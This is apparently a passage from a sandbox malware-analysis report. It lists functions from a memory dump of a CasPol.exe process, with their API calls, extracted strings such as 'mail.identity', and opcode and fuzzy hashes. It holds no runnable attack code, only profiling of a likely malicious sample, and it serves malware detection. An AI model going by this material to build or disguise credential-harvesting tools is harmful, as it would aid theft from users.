                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3798638045-0
                                                                                                                                                                                  • Opcode ID: baefdefab252ba5ebdbc5dbfb72098888a57285fb2abb1b9f47d437d3554fda2
                                                                                                                                                                                  • Instruction ID: 1bc0f942f430aed347c7303033341c470b8779a554354b53929018aa447f6f2a
                                                                                                                                                                                  • Opcode Fuzzy Hash: baefdefab252ba5ebdbc5dbfb72098888a57285fb2abb1b9f47d437d3554fda2
                                                                                                                                                                                  • Instruction Fuzzy Hash: A241D071600215EBCB24CF24C8C5B97B7A4BF05325F1483B6E958AB2D2C3789D81CBD8
                                                                                                                                                                                  Function 0040B5E5 Relevance: 6.1, APIs: 4, Instructions: 114stringCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00409DED: ??2@YAPAXI@Z.MSVCRT ref: 00409E0E
                                                                                                                                                                                    • Part of subcall function 00409DED: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00409ED5
                                                                                                                                                                                  • strlen.MSVCRT ref: 0040B60B
                                                                                                                                                                                  • atoi.MSVCRT(?), ref: 0040B619
                                                                                                                                                                                  • _mbsicmp.MSVCRT ref: 0040B66C
                                                                                                                                                                                  • _mbsicmp.MSVCRT ref: 0040B67F
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _mbsicmp$??2@??3@atoistrlen
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 4107816708-0
                                                                                                                                                                                  • Opcode ID: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
                                                                                                                                                                                  • Instruction ID: e44d10e2ba05df3f3c4ea20365ac2b40f6a529c5f902ff1350b2aa0f2f7d2ce1
                                                                                                                                                                                  • Opcode Fuzzy Hash: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3A413D35900204EFCF10DFA9C481AA9BBF4FF48348F1144BAE815AB392D739DA41CB99
                                                                                                                                                                                  Function 004113B2 Relevance: 6.1, APIs: 4, Instructions: 85stringCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041140E
                                                                                                                                                                                  • _gmtime64.MSVCRT ref: 00411437
                                                                                                                                                                                  • memcpy.MSVCRT(?,00000000,00000024,?,?,000003E8,00000000), ref: 0041144B
                                                                                                                                                                                  • strftime.MSVCRT ref: 00411476
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_gmtime64memcpystrftime
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1886415126-0
                                                                                                                                                                                  • Opcode ID: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                                                                                                                                                                  • Instruction ID: 0fc2308174198aa020173da426f8fce31fb0284c5be342abf897f659f69a0370
                                                                                                                                                                                  • Opcode Fuzzy Hash: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                                                                                                                                                                  • Instruction Fuzzy Hash: 6F21E472A013145BD320EB69C846B5BB7D8AF44734F044A1FFAA8D73D1D738E9448699
                                                                                                                                                                                  Function 00444462 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 84stringCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: strlen
                                                                                                                                                                                  • String ID: >$>$>
                                                                                                                                                                                  • API String ID: 39653677-3911187716
                                                                                                                                                                                  • Opcode ID: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
                                                                                                                                                                                  • Instruction ID: 00f684ae2741cafacb4c0f359147db44c9a3c2c025b4d94400920e38b4f60055
                                                                                                                                                                                  • Opcode Fuzzy Hash: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
                                                                                                                                                                                  • Instruction Fuzzy Hash: E131261180D6C4AEEB11CFA880463EEFFB05FA2304F5886DAD0D047743C67C964AC3AA
                                                                                                                                                                                  Function 0040D205 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                                                                                                                  • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                                                                                                                  • memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcpy
                                                                                                                                                                                  • String ID: @
                                                                                                                                                                                  • API String ID: 3510742995-2766056989
                                                                                                                                                                                  • Opcode ID: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                                                                                                                                                  • Instruction ID: 6d1199ef97cb2679a5b3fe4a4c98cea7b7ae300cfbacc21e3dff9814a3884c4c
                                                                                                                                                                                  • Opcode Fuzzy Hash: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                                                                                                                                                  • Instruction Fuzzy Hash: 41113DB2E007046BDB288E96DC80D5A77A8EFA0354700013FFE06662D1F639EA5DC7D8
                                                                                                                                                                                  Function 00407FA4 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 00407FD9
                                                                                                                                                                                  • memset.MSVCRT ref: 00407FEA
                                                                                                                                                                                  • memcpy.MSVCRT(0045791C,?,?,00000000,00000000,?,00000000,?,?,0040140F,?,?,?,?,00454020,0000000C), ref: 00407FF6
                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 00408003
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ??2@??3@memcpymemset
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1865533344-0
                                                                                                                                                                                  • Opcode ID: 3be125bbec447ab7c511ca77c5680941c96119bb7b45ebdfa7cd77d846b95589
                                                                                                                                                                                  • Instruction ID: b86030d1d6bc714dc1ef3b289d30c8af6c7ebcab3ecced31442563250122d8c5
                                                                                                                                                                                  • Opcode Fuzzy Hash: 3be125bbec447ab7c511ca77c5680941c96119bb7b45ebdfa7cd77d846b95589
                                                                                                                                                                                  • Instruction Fuzzy Hash: 9D116A752046019FE328DF19C881B26F7E5FFD8300B21882EE5DA97385DA35E801CB64
                                                                                                                                                                                  Function 0040E1C8 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 59COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _strcmpi
                                                                                                                                                                                  • String ID: C@$mail.identity
                                                                                                                                                                                  • API String ID: 1439213657-721921413
                                                                                                                                                                                  • Opcode ID: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                                                                                                                                                                                  • Instruction ID: e081b0b03caa8c584547328dd3c7b46ba64ccdb110812537a35def5e1e6d8c92
                                                                                                                                                                                  • Opcode Fuzzy Hash: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                                                                                                                                                                                  • Instruction Fuzzy Hash: DD110A325002199BEB20AA65DC41E8A739CEF00358F10453FF545B6182EF38F9598B98
                                                                                                                                                                                  Function 00410C68 Relevance: 6.1, APIs: 4, Instructions: 58COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • FindResourceA.KERNEL32(?,?,?), ref: 00410C75
                                                                                                                                                                                  • SizeofResource.KERNEL32(?,00000000), ref: 00410C86
                                                                                                                                                                                  • LoadResource.KERNEL32(?,00000000), ref: 00410C96
                                                                                                                                                                                  • LockResource.KERNEL32(00000000), ref: 00410CA1
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3473537107-0
                                                                                                                                                                                  • Opcode ID: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                                                                                                                                                                  • Instruction ID: 06b8370cebe37c7de172ca18b7cbf64f7437cd91f528590ddf6fb1777473d23a
                                                                                                                                                                                  • Opcode Fuzzy Hash: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                                                                                                                                                                  • Instruction Fuzzy Hash: 090196367012166F8B185F69DD9489F7EAEFB853913084136FC05C6361EB71C9818ED8
                                                                                                                                                                                  Function 00410F10 Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • SHGetMalloc.SHELL32(?), ref: 00410F20
                                                                                                                                                                                  • SHBrowseForFolder.SHELL32(?), ref: 00410F52
                                                                                                                                                                                  • SHGetPathFromIDList.SHELL32(00000000,?), ref: 00410F66
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,?), ref: 00410F79
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: BrowseFolderFromListMallocPath_mbscpy
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1479990042-0
                                                                                                                                                                                  • Opcode ID: 3021ac6996c314945b367224c7bd8111e1d6ec744ed02b95fe82b7a37a02f8bd
                                                                                                                                                                                  • Instruction ID: 6920bf835a9bb06566ba915c59caace60c79acb7cf9a25d2f41614c9f7770f55
                                                                                                                                                                                  • Opcode Fuzzy Hash: 3021ac6996c314945b367224c7bd8111e1d6ec744ed02b95fe82b7a37a02f8bd
                                                                                                                                                                                  • Instruction Fuzzy Hash: D411ECB5900208AFDB10DFE5D985AEEB7F8FB49314B10446AE505E7200D7B4DA458B64
                                                                                                                                                                                  Function 00406620 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 50COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 00406640
                                                                                                                                                                                    • Part of subcall function 004063B2: memset.MSVCRT ref: 0040644F
                                                                                                                                                                                    • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                                                                                                                                    • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                                                                                                                                  • memcmp.MSVCRT ref: 00406672
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000018,?,00000060,?,?,00000000,00000000), ref: 00406695
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcpy$memset$memcmp
                                                                                                                                                                                  • String ID: Ul@
                                                                                                                                                                                  • API String ID: 270934217-715280498
                                                                                                                                                                                  • Opcode ID: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                                                                                                                                                  • Instruction ID: 50cfa42ee3f36d69bd2a91aaf20a03d2fa08f341615043147a7a382cdea3e611
                                                                                                                                                                                  • Opcode Fuzzy Hash: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                                                                                                                                                  • Instruction Fuzzy Hash: 46017572A0020C6BEB10DAA58C06FEF73ADAB44705F450436FE49F2181E679AA1987B5
                                                                                                                                                                                  Function 0040B903 Relevance: 6.0, APIs: 4, Instructions: 45windowCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                                                                                                                                                                    • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001), ref: 00408EBE
                                                                                                                                                                                  • sprintf.MSVCRT ref: 0040B929
                                                                                                                                                                                  • SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B98C
                                                                                                                                                                                    • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00403F8E,0044C530), ref: 00408E31
                                                                                                                                                                                    • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                                                                                                                  • sprintf.MSVCRT ref: 0040B953
                                                                                                                                                                                  • _mbscat.MSVCRT ref: 0040B966
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: sprintf$LoadMessageSendString_mbscat_mbscpymemcpystrlen
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 203655857-0
                                                                                                                                                                                  • Opcode ID: e7a96a4b3b60773b868b861c6ef1878d2d31708076d5e2e16fac633899c29946
                                                                                                                                                                                  • Instruction ID: 0d6227c2dffbdb2154d3321facad49e181a647ebd34d8d5e6c5aab0b846496ed
                                                                                                                                                                                  • Opcode Fuzzy Hash: e7a96a4b3b60773b868b861c6ef1878d2d31708076d5e2e16fac633899c29946
                                                                                                                                                                                  • Instruction Fuzzy Hash: EE0117B2500308A6E721EB75DC87FE773ACAB54704F04046AB659B61C3DA78E5444A59
                                                                                                                                                                                  Function 0040ADC5 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 0040ADE8
                                                                                                                                                                                  • memset.MSVCRT ref: 0040ADFE
                                                                                                                                                                                    • Part of subcall function 0040A4E6: _mbscpy.MSVCRT(00000000,?,0040ABD2,?,?,?), ref: 0040A4EB
                                                                                                                                                                                    • Part of subcall function 0040A4E6: _strlwr.MSVCRT ref: 0040A52E
                                                                                                                                                                                  • sprintf.MSVCRT ref: 0040AE28
                                                                                                                                                                                    • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                                                                                                    • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00406D4D
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset$FileWrite_mbscpy_strlwrsprintfstrlen
                                                                                                                                                                                  • String ID: </%s>
                                                                                                                                                                                  • API String ID: 3699762281-259020660
                                                                                                                                                                                  • Opcode ID: f78139877eceb876a4a519055c942f2d4715b4df0d29a6dcbc188ebede795ba7
                                                                                                                                                                                  • Instruction ID: ff04cb2e9b10d1c503b051559ee948e99af9d8289afd69eb184e92e88926625d
                                                                                                                                                                                  • Opcode Fuzzy Hash: f78139877eceb876a4a519055c942f2d4715b4df0d29a6dcbc188ebede795ba7
                                                                                                                                                                                  • Instruction Fuzzy Hash: CF01F97290012967E721A619CC46FDEB76C9F54304F0500FAB50DF3142DA74AA448BA5
                                                                                                                                                                                  Function 0044B33B Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ??3@
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 613200358-0
                                                                                                                                                                                  • Opcode ID: 5d8d0877f012efe10e0b4b5f1adc401335cc840e4779c4491c3e00c233fdc506
                                                                                                                                                                                  • Instruction ID: 5841ab7dcc50b440abd9236b7832042a9d7d1d7b8957bb774bcacf87f05c1f29
                                                                                                                                                                                  • Opcode Fuzzy Hash: 5d8d0877f012efe10e0b4b5f1adc401335cc840e4779c4491c3e00c233fdc506
                                                                                                                                                                                  • Instruction Fuzzy Hash: AAE046A134974456BA10AF7BAC52F13239CEA803523168C6FB800F36D2EF2CE890846C
                                                                                                                                                                                  Function 0041865B Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 243COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 004176F4: memcmp.MSVCRT ref: 004177B6
                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418726
                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418770
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • recovered %d pages from %s, xrefs: 004188B4
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$memcmp
                                                                                                                                                                                  • String ID: recovered %d pages from %s
                                                                                                                                                                                  • API String ID: 985450955-1623757624
                                                                                                                                                                                  • Opcode ID: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                                                                                                                                                                  • Instruction ID: 98aa3c95e39363207900286e283e4ca218167c091a2ac8f6aa08d387a6555cb7
                                                                                                                                                                                  • Opcode Fuzzy Hash: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                                                                                                                                                                  • Instruction Fuzzy Hash: BA81AF759006049FDB25DBA8C880AEFB7F6EF84324F25441EE95597381DF38AD82CB58
                                                                                                                                                                                  Function 004021FF Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _ultoasprintf
                                                                                                                                                                                  • String ID: %s %s %s
                                                                                                                                                                                  • API String ID: 432394123-3850900253
                                                                                                                                                                                  • Opcode ID: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                                                                                                                                                                                  • Instruction ID: 5b4e28b1b4fc8494891684f3550fd3cb18a3cec27640a2844273e51cea36df92
                                                                                                                                                                                  • Opcode Fuzzy Hash: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                                                                                                                                                                                  • Instruction Fuzzy Hash: 80412331504A15C7C93595648B8DBEBA3A8BB46300F5804BFDCAAB32C0D3FCAD42865E
                                                                                                                                                                                  Function 00409901 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 00409919
                                                                                                                                                                                  • SendMessageA.USER32(N\@,00001019,00000000,?), ref: 00409948
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: MessageSendmemset
                                                                                                                                                                                  • String ID: N\@
                                                                                                                                                                                  • API String ID: 568519121-3851889168
                                                                                                                                                                                  • Opcode ID: 2010a019ef781dd6939f17f8e62f95d5074ac9a6fd296138cb71cbff55b3af76
                                                                                                                                                                                  • Instruction ID: 8500237f8b168207f1c9a25e89cff2ec53edf3448a21c69821c5a9264d9502ca
                                                                                                                                                                                  • Opcode Fuzzy Hash: 2010a019ef781dd6939f17f8e62f95d5074ac9a6fd296138cb71cbff55b3af76
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3C016279800205AADB209F59C845AEBB7F8FF85B45F00802DE894B6241D374A945CB79
                                                                                                                                                                                  Function 00409070 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21windowCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • LoadMenuA.USER32(00000000), ref: 00409078
                                                                                                                                                                                  • sprintf.MSVCRT ref: 0040909B
                                                                                                                                                                                    • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
                                                                                                                                                                                    • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
                                                                                                                                                                                    • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
                                                                                                                                                                                    • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
                                                                                                                                                                                    • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
                                                                                                                                                                                    • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
                                                                                                                                                                                    • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                                                                                                                                                                                  • String ID: menu_%d
                                                                                                                                                                                  • API String ID: 1129539653-2417748251
                                                                                                                                                                                  • Opcode ID: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                                                                                                                                  • Instruction ID: bbc3668ae8aad1463aedfde5e5dd5b48340f77aa4c3989790123ead7330def9b
                                                                                                                                                                                  • Opcode Fuzzy Hash: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                                                                                                                                  • Instruction Fuzzy Hash: 2ED0C260A4124036EA2023366C0AF4B1A099BC271AF14022EF000B20C3EBFC844482BE
                                                                                                                                                                                  Function 004116E1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • failed memory resize %u to %u bytes, xrefs: 00411706
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _msizerealloc
                                                                                                                                                                                  • String ID: failed memory resize %u to %u bytes
                                                                                                                                                                                  • API String ID: 2713192863-2134078882
                                                                                                                                                                                  • Opcode ID: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                                                                                                                                                                  • Instruction ID: 6d708a2afe7937de994116278d2c06faa365a3e4d7322368aba5da3f7b150b0b
                                                                                                                                                                                  • Opcode Fuzzy Hash: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                                                                                                                                                                  • Instruction Fuzzy Hash: DBD0C2329092107EEB152250AC03B5FAB51DB80374F25850FF658451A1E6795C108389
                                                                                                                                                                                  Function 004097FF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15stringCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00406F96: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,00409805,00000000,00409723,?,00000000,00000104), ref: 00406FA1
                                                                                                                                                                                  • strrchr.MSVCRT ref: 00409808
                                                                                                                                                                                  • _mbscat.MSVCRT ref: 0040981D
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FileModuleName_mbscatstrrchr
                                                                                                                                                                                  • String ID: _lng.ini
                                                                                                                                                                                  • API String ID: 3334749609-1948609170
                                                                                                                                                                                  • Opcode ID: 98f2440ea2097efbff780d18735bc8e6eaa27cf1360ec9cb317463341ca83b29
                                                                                                                                                                                  • Instruction ID: 627d3aba04136714d7c1818045af5338c576ea1e6c84acb30438f8bc90b354f8
                                                                                                                                                                                  • Opcode Fuzzy Hash: 98f2440ea2097efbff780d18735bc8e6eaa27cf1360ec9cb317463341ca83b29
                                                                                                                                                                                  • Instruction Fuzzy Hash: 73C080019497D018F12235212D03F4F06884F83709F34005FF801796C3EF9CA611407F
